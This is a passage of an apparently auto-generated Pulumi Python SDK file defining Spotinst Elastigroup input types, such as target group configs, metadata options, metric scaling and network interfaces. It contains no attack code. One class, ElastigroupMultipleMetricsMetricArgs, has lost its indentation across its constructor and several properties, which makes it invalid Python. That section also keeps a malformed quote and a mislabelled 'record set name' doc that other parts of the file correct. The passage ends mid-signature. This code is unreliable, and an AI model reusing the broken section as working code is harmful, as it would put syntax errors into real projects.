    @load_balancer_arn.setter
    def load_balancer_arn(self, value: pulumi.Input[str]):
        pulumi.set(self, "load_balancer_arn", value)
@pulumi.input_type
class ElastigroupItfLoadBalancerListenerRuleArgs:
    """A single listener rule, identified by its ARN."""

    def __init__(__self__, *,
                 rule_arn: pulumi.Input[str]):
        """
        :param rule_arn: ARN of the listener rule.
        """
        # `rule_arn` is the only (required) field of this input type.
        pulumi.set(__self__, "rule_arn", rule_arn)

    @property
    @pulumi.getter(name="ruleArn")
    def rule_arn(self) -> pulumi.Input[str]:
        """ARN of the listener rule."""
        return pulumi.get(self, "rule_arn")

    @rule_arn.setter
    def rule_arn(self, value: pulumi.Input[str]):
        pulumi.set(self, "rule_arn", value)
@pulumi.input_type
class ElastigroupItfTargetGroupConfigArgs:
    """Configuration for a target group created by ITF: routing (port/protocol/VPC)
    plus the standard ELBv2 health-check knobs.
    NOTE(review): most field docs are absent upstream; the field names mirror the
    AWS ELBv2 CreateTargetGroup parameters — confirm semantics against that API."""

    def __init__(__self__, *,
                 health_check_path: pulumi.Input[str],
                 port: pulumi.Input[int],
                 protocol: pulumi.Input[str],
                 vpc_id: pulumi.Input[str],
                 health_check_interval_seconds: Optional[pulumi.Input[int]] = None,
                 health_check_port: Optional[pulumi.Input[str]] = None,
                 health_check_protocol: Optional[pulumi.Input[str]] = None,
                 health_check_timeout_seconds: Optional[pulumi.Input[int]] = None,
                 healthy_threshold_count: Optional[pulumi.Input[int]] = None,
                 matchers: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupItfTargetGroupConfigMatcherArgs']]]] = None,
                 protocol_version: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupItfTargetGroupConfigTagArgs']]]] = None,
                 unhealthy_threshold_count: Optional[pulumi.Input[int]] = None):
        """
        :param health_check_path: Destination path for target health checks.
        :param port: Port on which the targets receive traffic.
        :param protocol: Protocol used to route traffic to the targets.
        :param vpc_id: VPC in which the target group is created.
        :param matchers: Success-code matchers (gRPC/HTTP) for health checks.
        :param tags: A list of tag (key/value) objects to assign to the target
            group. (The generated doc said "key/value mapping"; the element type
            is a list of tag objects.)
        """
        pulumi.set(__self__, "health_check_path", health_check_path)
        pulumi.set(__self__, "port", port)
        pulumi.set(__self__, "protocol", protocol)
        pulumi.set(__self__, "vpc_id", vpc_id)
        # Optional fields are only recorded when supplied.
        if health_check_interval_seconds is not None:
            pulumi.set(__self__, "health_check_interval_seconds", health_check_interval_seconds)
        if health_check_port is not None:
            pulumi.set(__self__, "health_check_port", health_check_port)
        if health_check_protocol is not None:
            pulumi.set(__self__, "health_check_protocol", health_check_protocol)
        if health_check_timeout_seconds is not None:
            pulumi.set(__self__, "health_check_timeout_seconds", health_check_timeout_seconds)
        if healthy_threshold_count is not None:
            pulumi.set(__self__, "healthy_threshold_count", healthy_threshold_count)
        if matchers is not None:
            pulumi.set(__self__, "matchers", matchers)
        if protocol_version is not None:
            pulumi.set(__self__, "protocol_version", protocol_version)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)
        if unhealthy_threshold_count is not None:
            pulumi.set(__self__, "unhealthy_threshold_count", unhealthy_threshold_count)

    @property
    @pulumi.getter(name="healthCheckPath")
    def health_check_path(self) -> pulumi.Input[str]:
        """Destination path for target health checks."""
        return pulumi.get(self, "health_check_path")

    @health_check_path.setter
    def health_check_path(self, value: pulumi.Input[str]):
        pulumi.set(self, "health_check_path", value)

    @property
    @pulumi.getter
    def port(self) -> pulumi.Input[int]:
        """Port on which the targets receive traffic."""
        return pulumi.get(self, "port")

    @port.setter
    def port(self, value: pulumi.Input[int]):
        pulumi.set(self, "port", value)

    @property
    @pulumi.getter
    def protocol(self) -> pulumi.Input[str]:
        """Protocol used to route traffic to the targets."""
        return pulumi.get(self, "protocol")

    @protocol.setter
    def protocol(self, value: pulumi.Input[str]):
        pulumi.set(self, "protocol", value)

    @property
    @pulumi.getter(name="vpcId")
    def vpc_id(self) -> pulumi.Input[str]:
        """VPC in which the target group is created."""
        return pulumi.get(self, "vpc_id")

    @vpc_id.setter
    def vpc_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "vpc_id", value)

    @property
    @pulumi.getter(name="healthCheckIntervalSeconds")
    def health_check_interval_seconds(self) -> Optional[pulumi.Input[int]]:
        """Seconds between health checks of an individual target."""
        return pulumi.get(self, "health_check_interval_seconds")

    @health_check_interval_seconds.setter
    def health_check_interval_seconds(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "health_check_interval_seconds", value)

    @property
    @pulumi.getter(name="healthCheckPort")
    def health_check_port(self) -> Optional[pulumi.Input[str]]:
        """Port used for health checks (string, as in the ELBv2 API)."""
        return pulumi.get(self, "health_check_port")

    @health_check_port.setter
    def health_check_port(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "health_check_port", value)

    @property
    @pulumi.getter(name="healthCheckProtocol")
    def health_check_protocol(self) -> Optional[pulumi.Input[str]]:
        """Protocol used for health checks."""
        return pulumi.get(self, "health_check_protocol")

    @health_check_protocol.setter
    def health_check_protocol(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "health_check_protocol", value)

    @property
    @pulumi.getter(name="healthCheckTimeoutSeconds")
    def health_check_timeout_seconds(self) -> Optional[pulumi.Input[int]]:
        """Seconds during which no response means a failed health check."""
        return pulumi.get(self, "health_check_timeout_seconds")

    @health_check_timeout_seconds.setter
    def health_check_timeout_seconds(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "health_check_timeout_seconds", value)

    @property
    @pulumi.getter(name="healthyThresholdCount")
    def healthy_threshold_count(self) -> Optional[pulumi.Input[int]]:
        """Consecutive successful checks required before a target is healthy."""
        return pulumi.get(self, "healthy_threshold_count")

    @healthy_threshold_count.setter
    def healthy_threshold_count(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "healthy_threshold_count", value)

    @property
    @pulumi.getter
    def matchers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupItfTargetGroupConfigMatcherArgs']]]]:
        """Success-code matchers (gRPC/HTTP) for health checks."""
        return pulumi.get(self, "matchers")

    @matchers.setter
    def matchers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupItfTargetGroupConfigMatcherArgs']]]]):
        pulumi.set(self, "matchers", value)

    @property
    @pulumi.getter(name="protocolVersion")
    def protocol_version(self) -> Optional[pulumi.Input[str]]:
        """Protocol version (e.g. HTTP1/HTTP2/GRPC — TODO confirm valid values)."""
        return pulumi.get(self, "protocol_version")

    @protocol_version.setter
    def protocol_version(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "protocol_version", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupItfTargetGroupConfigTagArgs']]]]:
        """
        A list of tag (key/value) objects to assign to the target group.
        """
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupItfTargetGroupConfigTagArgs']]]]):
        pulumi.set(self, "tags", value)

    @property
    @pulumi.getter(name="unhealthyThresholdCount")
    def unhealthy_threshold_count(self) -> Optional[pulumi.Input[int]]:
        """Consecutive failed checks required before a target is unhealthy."""
        return pulumi.get(self, "unhealthy_threshold_count")

    @unhealthy_threshold_count.setter
    def unhealthy_threshold_count(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "unhealthy_threshold_count", value)
@pulumi.input_type
class ElastigroupItfTargetGroupConfigMatcherArgs:
    """Health-check success-code matcher: a gRPC code range and/or an HTTP code range."""

    def __init__(__self__, *,
                 grpc_code: Optional[pulumi.Input[str]] = None,
                 http_code: Optional[pulumi.Input[str]] = None):
        """
        :param grpc_code: gRPC success codes to match.
        :param http_code: HTTP success codes to match.
        """
        # Record only the codes the caller actually supplied.
        for attr_name, attr_value in (("grpc_code", grpc_code), ("http_code", http_code)):
            if attr_value is not None:
                pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter(name="grpcCode")
    def grpc_code(self) -> Optional[pulumi.Input[str]]:
        """gRPC success codes to match."""
        return pulumi.get(self, "grpc_code")

    @grpc_code.setter
    def grpc_code(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "grpc_code", value)

    @property
    @pulumi.getter(name="httpCode")
    def http_code(self) -> Optional[pulumi.Input[str]]:
        """HTTP success codes to match."""
        return pulumi.get(self, "http_code")

    @http_code.setter
    def http_code(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "http_code", value)
@pulumi.input_type
class ElastigroupItfTargetGroupConfigTagArgs:
    """A single tag (key plus optional value) attached to an ITF target group config."""

    def __init__(__self__, *,
                 tag_key: pulumi.Input[str],
                 tag_value: Optional[pulumi.Input[str]] = None):
        """
        :param tag_key: The tag's key.
        :param tag_value: The tag's value (optional).
        """
        pulumi.set(__self__, "tag_key", tag_key)
        if tag_value is None:
            # An omitted value is simply not recorded.
            return
        pulumi.set(__self__, "tag_value", tag_value)

    @property
    @pulumi.getter(name="tagKey")
    def tag_key(self) -> pulumi.Input[str]:
        """The tag's key."""
        return pulumi.get(self, "tag_key")

    @tag_key.setter
    def tag_key(self, value: pulumi.Input[str]):
        pulumi.set(self, "tag_key", value)

    @property
    @pulumi.getter(name="tagValue")
    def tag_value(self) -> Optional[pulumi.Input[str]]:
        """The tag's value, if one was provided."""
        return pulumi.get(self, "tag_value")

    @tag_value.setter
    def tag_value(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "tag_value", value)
@pulumi.input_type
class ElastigroupMetadataOptionsArgs:
    """EC2 instance-metadata-service (IMDS) options for the Elastigroup's instances."""

    def __init__(__self__, *,
                 http_tokens: pulumi.Input[str],
                 http_put_response_hop_limit: Optional[pulumi.Input[int]] = None):
        """
        :param pulumi.Input[str] http_tokens: The state of token usage for your instance metadata requests. Valid values: `optional` or `required`.
        :param pulumi.Input[int] http_put_response_hop_limit: The desired HTTP PUT response hop limit for instance metadata requests. The larger the number, the further instance metadata requests can travel. Valid values: Integers from `1` to `64`.
        """
        pulumi.set(__self__, "http_tokens", http_tokens)
        if http_put_response_hop_limit is not None:
            pulumi.set(__self__, "http_put_response_hop_limit", http_put_response_hop_limit)

    @property
    @pulumi.getter(name="httpTokens")
    def http_tokens(self) -> pulumi.Input[str]:
        """
        The state of token usage for your instance metadata requests. Valid values: `optional` or `required`.
        """
        return pulumi.get(self, "http_tokens")

    @http_tokens.setter
    def http_tokens(self, value: pulumi.Input[str]):
        pulumi.set(self, "http_tokens", value)

    @property
    @pulumi.getter(name="httpPutResponseHopLimit")
    def http_put_response_hop_limit(self) -> Optional[pulumi.Input[int]]:
        """
        The desired HTTP PUT response hop limit for instance metadata requests. The larger the number, the further instance metadata requests can travel. Valid values: Integers from `1` to `64`.
        """
        return pulumi.get(self, "http_put_response_hop_limit")

    @http_put_response_hop_limit.setter
    def http_put_response_hop_limit(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "http_put_response_hop_limit", value)
@pulumi.input_type
class ElastigroupMultaiTargetSetArgs:
    """Links the group to a Multai load balancer target set."""

    def __init__(__self__, *,
                 balancer_id: pulumi.Input[str],
                 target_set_id: pulumi.Input[str]):
        """
        :param pulumi.Input[str] balancer_id: ID of Multai Load Balancer.
        :param pulumi.Input[str] target_set_id: ID of Multai target set.
        """
        # Both identifiers are required; record them unconditionally.
        for attr_name, attr_value in (("balancer_id", balancer_id),
                                      ("target_set_id", target_set_id)):
            pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter(name="balancerId")
    def balancer_id(self) -> pulumi.Input[str]:
        """ID of Multai Load Balancer."""
        return pulumi.get(self, "balancer_id")

    @balancer_id.setter
    def balancer_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "balancer_id", value)

    @property
    @pulumi.getter(name="targetSetId")
    def target_set_id(self) -> pulumi.Input[str]:
        """ID of Multai target set."""
        return pulumi.get(self, "target_set_id")

    @target_set_id.setter
    def target_set_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "target_set_id", value)
@pulumi.input_type
class ElastigroupMultipleMetricsArgs:
    """Multiple-metrics scaling configuration: CloudWatch metrics plus expressions
    combining them."""

    def __init__(__self__, *,
                 expressions: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupMultipleMetricsExpressionArgs']]]] = None,
                 metrics: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupMultipleMetricsMetricArgs']]]] = None):
        """
        :param pulumi.Input[Sequence[pulumi.Input['ElastigroupMultipleMetricsExpressionArgs']]] expressions: Array of objects (Expression config)
        :param pulumi.Input[Sequence[pulumi.Input['ElastigroupMultipleMetricsMetricArgs']]] metrics: Array of objects (Metric config)
        """
        if expressions is not None:
            pulumi.set(__self__, "expressions", expressions)
        if metrics is not None:
            pulumi.set(__self__, "metrics", metrics)

    @property
    @pulumi.getter
    def expressions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupMultipleMetricsExpressionArgs']]]]:
        """
        Array of objects (Expression config)
        """
        return pulumi.get(self, "expressions")

    @expressions.setter
    def expressions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupMultipleMetricsExpressionArgs']]]]):
        pulumi.set(self, "expressions", value)

    @property
    @pulumi.getter
    def metrics(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupMultipleMetricsMetricArgs']]]]:
        """
        Array of objects (Metric config)
        """
        return pulumi.get(self, "metrics")

    @metrics.setter
    def metrics(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupMultipleMetricsMetricArgs']]]]):
        pulumi.set(self, "metrics", value)
@pulumi.input_type
class ElastigroupMultipleMetricsExpressionArgs:
    """A named expression combining metrics from the 'metrics' array."""

    def __init__(__self__, *,
                 expression: pulumi.Input[str],
                 name: pulumi.Input[str]):
        """
        :param pulumi.Input[str] expression: An expression consisting of the metric names listed in the 'metrics' array.
        :param pulumi.Input[str] name: The name of the expression. (The generated
            doc said "record set name" — a copy-paste error from the Route 53 type.)
        """
        pulumi.set(__self__, "expression", expression)
        pulumi.set(__self__, "name", name)

    @property
    @pulumi.getter
    def expression(self) -> pulumi.Input[str]:
        """
        An expression consisting of the metric names listed in the 'metrics' array.
        """
        return pulumi.get(self, "expression")

    @expression.setter
    def expression(self, value: pulumi.Input[str]):
        pulumi.set(self, "expression", value)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        The name of the expression.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)
@pulumi.input_type
class ElastigroupMultipleMetricsMetricArgs:
def __init__(__self__, *,
metric_name: pulumi.Input[str],
name: pulumi.Input[str],
namespace: pulumi.Input[str],
dimensions: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupMultipleMetricsMetricDimensionArgs']]]] = None,
extended_statistic: Optional[pulumi.Input[str]] = None,
statistic: Optional[pulumi.Input[str]] = None,
unit: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] metric_name: The name of the metric, with or without spaces.
:param pulumi.Input[str] name: The record set name.
:param pulumi.Input[str] namespace: The namespace for the alarm's associated metric.
:param pulumi.Input[Sequence[pulumi.Input['ElastigroupMultipleMetricsMetricDimensionArgs']]] dimensions: A list of dimensions describing qualities of the metric.
*`name` - (Required) the dimension name.
*`value` - (Optional) the dimension value.
:param pulumi.Input[str] extended_statistic: Percentile statistic. Valid values: `"p0.1"` - `"p100"`.
:param pulumi.Input[str] statistic: The metric statistics to return. For information about specific statistics go to [Statistics](http://docs.aws.amazon.com/AmazonCloudWatch/latest/DeveloperGuide/index.html?CHAP_TerminologyandKeyConcepts.html#Statistic) in the Amazon CloudWatch Developer Guide.
:param pulumi.Input[str] unit: The unit for the alarm's associated metric. Valid values: `"percent`, `"seconds"`, `"microseconds"`, `"milliseconds"`, `"bytes"`, `"kilobytes"`, `"megabytes"`, `"gigabytes"`, `"terabytes"`, `"bits"`, `"kilobits"`, `"megabits"`, `"gigabits"`, `"terabits"`, `"count"`, `"bytes/second"`, `"kilobytes/second"`, `"megabytes/second"`, `"gigabytes/second"`, `"terabytes/second"`, `"bits/second"`, `"kilobits/second"`, `"megabits/second"`, `"gigabits/second"`, `"terabits/second"`, `"count/second"`, `"none"`.
"""
pulumi.set(__self__, "metric_name", metric_name)
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "namespace", namespace)
if dimensions is not None:
pulumi.set(__self__, "dimensions", dimensions)
if extended_statistic is not None:
pulumi.set(__self__, "extended_statistic", extended_statistic)
if statistic is not None:
pulumi.set(__self__, "statistic", statistic)
if unit is not None:
pulumi.set(__self__, "unit", unit)
@property
@pulumi.getter(name="metricName")
def metric_name(self) -> pulumi.Input[str]:
"""
The name of the metric, with or without spaces.
"""
return pulumi.get(self, "metric_name")
@metric_name.setter
def metric_name(self, value: pulumi.Input[str]):
pulumi.set(self, "metric_name", value)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The record set name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def namespace(self) -> pulumi.Input[str]:
"""
The namespace for the alarm's associated metric.
"""
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: pulumi.Input[str]):
pulumi.set(self, "namespace", value)
@property
@pulumi.getter
def dimensions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupMultipleMetricsMetricDimensionArgs']]]]:
"""
A list of dimensions describing qualities of the metric.
*`name` - (Required) the dimension name.
*`value` - (Optional) the dimension value.
"""
return pulumi.get(self, "dimensions")
@dimensions.setter
def dimensions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupMultipleMetricsMetricDimensionArgs']]]]):
pulumi.set(self, "dimensions", value)
@property
@pulumi.getter(name="extendedStatistic")
def extended_statistic(self) -> Optional[pulumi.Input[str]]:
"""
Percentile statistic. Valid values: `"p0.1"` - `"p100"`.
"""
return pulumi.get(self, "extended_statistic")
@extended_statistic.setter
def extended_statistic(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "extended_statistic", value)
    @property
    @pulumi.getter
    def statistic(self) -> Optional[pulumi.Input[str]]:
        """
        The metric statistics to return. For information about specific statistics go to [Statistics](http://docs.aws.amazon.com/AmazonCloudWatch/latest/DeveloperGuide/index.html?CHAP_TerminologyandKeyConcepts.html#Statistic) in the Amazon CloudWatch Developer Guide.
        """
        return pulumi.get(self, "statistic")
    @statistic.setter
    def statistic(self, value: Optional[pulumi.Input[str]]):
        # Optional: absent unless set by the caller.
        pulumi.set(self, "statistic", value)
    @property
    @pulumi.getter
    def unit(self) -> Optional[pulumi.Input[str]]:
        """
        The unit for the alarm's associated metric. Valid values: `"percent"`, `"seconds"`, `"microseconds"`, `"milliseconds"`, `"bytes"`, `"kilobytes"`, `"megabytes"`, `"gigabytes"`, `"terabytes"`, `"bits"`, `"kilobits"`, `"megabits"`, `"gigabits"`, `"terabits"`, `"count"`, `"bytes/second"`, `"kilobytes/second"`, `"megabytes/second"`, `"gigabytes/second"`, `"terabytes/second"`, `"bits/second"`, `"kilobits/second"`, `"megabits/second"`, `"gigabits/second"`, `"terabits/second"`, `"count/second"`, `"none"`.
        """
        return pulumi.get(self, "unit")
    @unit.setter
    def unit(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "unit", value)
@pulumi.input_type
class ElastigroupMultipleMetricsMetricDimensionArgs:
    def __init__(__self__, *,
                 name: pulumi.Input[str],
                 value: Optional[pulumi.Input[str]] = None):
        """
        A single dimension (name/value pair) qualifying a metric.

        :param pulumi.Input[str] name: The dimension name.
        :param pulumi.Input[str] value: The dimension value.
        """
        pulumi.set(__self__, "name", name)
        if value is not None:
            pulumi.set(__self__, "value", value)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        The dimension name.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def value(self) -> Optional[pulumi.Input[str]]:
        """
        The dimension value.
        """
        return pulumi.get(self, "value")

    @value.setter
    def value(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "value", value)
@pulumi.input_type
class ElastigroupNetworkInterfaceArgs:
    def __init__(__self__, *,
                 device_index: pulumi.Input[str],
                 associate_ipv6_address: Optional[pulumi.Input[bool]] = None,
                 associate_public_ip_address: Optional[pulumi.Input[bool]] = None,
                 delete_on_termination: Optional[pulumi.Input[bool]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 network_interface_id: Optional[pulumi.Input[str]] = None,
                 private_ip_address: Optional[pulumi.Input[str]] = None,
                 secondary_private_ip_address_count: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] device_index: The index of the device on the instance for the network interface attachment.
        :param pulumi.Input[bool] associate_ipv6_address: Indicates whether to assign IPV6 addresses to your instance. Requires a subnet with IPV6 CIDR block ranges.
        :param pulumi.Input[bool] associate_public_ip_address: Indicates whether to assign a public IP address to an instance you launch in a VPC. The public IP address can only be assigned to a network interface for eth0, and can only be assigned to a new network interface, not an existing one.
        :param pulumi.Input[bool] delete_on_termination: If set to true, the interface is deleted when the instance is terminated.
        :param pulumi.Input[str] description: The description of the network interface.
        :param pulumi.Input[str] network_interface_id: The ID of the network interface.
        :param pulumi.Input[str] private_ip_address: The private IP address of the network interface.
        :param pulumi.Input[str] secondary_private_ip_address_count: The number of secondary private IP addresses.
        """
        pulumi.set(__self__, "device_index", device_index)
        # Persist only the optional arguments the caller actually supplied,
        # in declaration order.
        supplied = {
            "associate_ipv6_address": associate_ipv6_address,
            "associate_public_ip_address": associate_public_ip_address,
            "delete_on_termination": delete_on_termination,
            "description": description,
            "network_interface_id": network_interface_id,
            "private_ip_address": private_ip_address,
            "secondary_private_ip_address_count": secondary_private_ip_address_count,
        }
        for attr, arg in supplied.items():
            if arg is not None:
                pulumi.set(__self__, attr, arg)

    @property
    @pulumi.getter(name="deviceIndex")
    def device_index(self) -> pulumi.Input[str]:
        """
        The index of the device on the instance for the network interface attachment.
        """
        return pulumi.get(self, "device_index")

    @device_index.setter
    def device_index(self, value: pulumi.Input[str]):
        pulumi.set(self, "device_index", value)

    @property
    @pulumi.getter(name="associateIpv6Address")
    def associate_ipv6_address(self) -> Optional[pulumi.Input[bool]]:
        """
        Indicates whether to assign IPV6 addresses to your instance. Requires a subnet with IPV6 CIDR block ranges.
        """
        return pulumi.get(self, "associate_ipv6_address")

    @associate_ipv6_address.setter
    def associate_ipv6_address(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "associate_ipv6_address", value)

    @property
    @pulumi.getter(name="associatePublicIpAddress")
    def associate_public_ip_address(self) -> Optional[pulumi.Input[bool]]:
        """
        Indicates whether to assign a public IP address to an instance you launch in a VPC. The public IP address can only be assigned to a network interface for eth0, and can only be assigned to a new network interface, not an existing one.
        """
        return pulumi.get(self, "associate_public_ip_address")

    @associate_public_ip_address.setter
    def associate_public_ip_address(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "associate_public_ip_address", value)

    @property
    @pulumi.getter(name="deleteOnTermination")
    def delete_on_termination(self) -> Optional[pulumi.Input[bool]]:
        """
        If set to true, the interface is deleted when the instance is terminated.
        """
        return pulumi.get(self, "delete_on_termination")

    @delete_on_termination.setter
    def delete_on_termination(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "delete_on_termination", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        The description of the network interface.
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter(name="networkInterfaceId")
    def network_interface_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the network interface.
        """
        return pulumi.get(self, "network_interface_id")

    @network_interface_id.setter
    def network_interface_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "network_interface_id", value)

    @property
    @pulumi.getter(name="privateIpAddress")
    def private_ip_address(self) -> Optional[pulumi.Input[str]]:
        """
        The private IP address of the network interface.
        """
        return pulumi.get(self, "private_ip_address")

    @private_ip_address.setter
    def private_ip_address(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "private_ip_address", value)

    @property
    @pulumi.getter(name="secondaryPrivateIpAddressCount")
    def secondary_private_ip_address_count(self) -> Optional[pulumi.Input[str]]:
        """
        The number of secondary private IP addresses.
        """
        return pulumi.get(self, "secondary_private_ip_address_count")

    @secondary_private_ip_address_count.setter
    def secondary_private_ip_address_count(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "secondary_private_ip_address_count", value)
@pulumi.input_type
class ElastigroupResourceTagSpecificationArgs:
    def __init__(__self__, *,
                 should_tag_amis: Optional[pulumi.Input[bool]] = None,
                 should_tag_enis: Optional[pulumi.Input[bool]] = None,
                 should_tag_snapshots: Optional[pulumi.Input[bool]] = None,
                 should_tag_volumes: Optional[pulumi.Input[bool]] = None):
        """
        :param pulumi.Input[bool] should_tag_amis: Tag specification for AMI resources.
        :param pulumi.Input[bool] should_tag_enis: Tag specification for ENI resources.
        :param pulumi.Input[bool] should_tag_snapshots: Tag specification for Snapshot resources.
        :param pulumi.Input[bool] should_tag_volumes: Tag specification for Volume resources.
        """
        # Store only the flags that were explicitly provided.
        flags = {
            "should_tag_amis": should_tag_amis,
            "should_tag_enis": should_tag_enis,
            "should_tag_snapshots": should_tag_snapshots,
            "should_tag_volumes": should_tag_volumes,
        }
        for attr, flag in flags.items():
            if flag is not None:
                pulumi.set(__self__, attr, flag)

    @property
    @pulumi.getter(name="shouldTagAmis")
    def should_tag_amis(self) -> Optional[pulumi.Input[bool]]:
        """
        Tag specification for AMI resources.
        """
        return pulumi.get(self, "should_tag_amis")

    @should_tag_amis.setter
    def should_tag_amis(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "should_tag_amis", value)

    @property
    @pulumi.getter(name="shouldTagEnis")
    def should_tag_enis(self) -> Optional[pulumi.Input[bool]]:
        """
        Tag specification for ENI resources.
        """
        return pulumi.get(self, "should_tag_enis")

    @should_tag_enis.setter
    def should_tag_enis(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "should_tag_enis", value)

    @property
    @pulumi.getter(name="shouldTagSnapshots")
    def should_tag_snapshots(self) -> Optional[pulumi.Input[bool]]:
        """
        Tag specification for Snapshot resources.
        """
        return pulumi.get(self, "should_tag_snapshots")

    @should_tag_snapshots.setter
    def should_tag_snapshots(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "should_tag_snapshots", value)

    @property
    @pulumi.getter(name="shouldTagVolumes")
    def should_tag_volumes(self) -> Optional[pulumi.Input[bool]]:
        """
        Tag specification for Volume resources.
        """
        return pulumi.get(self, "should_tag_volumes")

    @should_tag_volumes.setter
    def should_tag_volumes(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "should_tag_volumes", value)
@pulumi.input_type
class ElastigroupRevertToSpotArgs:
    def __init__(__self__, *,
                 perform_at: pulumi.Input[str],
                 time_windows: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
        """
        Settings controlling when the group reverts instances back to spot.

        :param pulumi.Input[str] perform_at: Actions to perform (options: timeWindow, never)
        :param pulumi.Input[Sequence[pulumi.Input[str]]] time_windows: A list of time windows in which to execute the revertToSpot strategy. Time window format: `ddd:hh:mm-ddd:hh:mm`. Example: `Mon:03:00-Wed:02:30`
        """
        pulumi.set(__self__, "perform_at", perform_at)
        if time_windows is not None:
            pulumi.set(__self__, "time_windows", time_windows)

    @property
    @pulumi.getter(name="performAt")
    def perform_at(self) -> pulumi.Input[str]:
        """
        Actions to perform (options: timeWindow, never)
        """
        return pulumi.get(self, "perform_at")

    @perform_at.setter
    def perform_at(self, value: pulumi.Input[str]):
        pulumi.set(self, "perform_at", value)

    @property
    @pulumi.getter(name="timeWindows")
    def time_windows(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        A list of time windows in which to execute the revertToSpot strategy. Time window format: `ddd:hh:mm-ddd:hh:mm`. Example: `Mon:03:00-Wed:02:30`
        """
        return pulumi.get(self, "time_windows")

    @time_windows.setter
    def time_windows(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "time_windows", value)
@pulumi.input_type
class ElastigroupScalingDownPolicyArgs:
    def __init__(__self__, *,
                 metric_name: pulumi.Input[str],
                 namespace: pulumi.Input[str],
                 policy_name: pulumi.Input[str],
                 action_type: Optional[pulumi.Input[str]] = None,
                 adjustment: Optional[pulumi.Input[str]] = None,
                 cooldown: Optional[pulumi.Input[int]] = None,
                 dimensions: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingDownPolicyDimensionArgs']]]] = None,
                 evaluation_periods: Optional[pulumi.Input[int]] = None,
                 is_enabled: Optional[pulumi.Input[bool]] = None,
                 max_target_capacity: Optional[pulumi.Input[str]] = None,
                 maximum: Optional[pulumi.Input[str]] = None,
                 min_target_capacity: Optional[pulumi.Input[str]] = None,
                 minimum: Optional[pulumi.Input[str]] = None,
                 operator: Optional[pulumi.Input[str]] = None,
                 period: Optional[pulumi.Input[int]] = None,
                 source: Optional[pulumi.Input[str]] = None,
                 statistic: Optional[pulumi.Input[str]] = None,
                 step_adjustments: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingDownPolicyStepAdjustmentArgs']]]] = None,
                 target: Optional[pulumi.Input[str]] = None,
                 threshold: Optional[pulumi.Input[float]] = None,
                 unit: Optional[pulumi.Input[str]] = None):
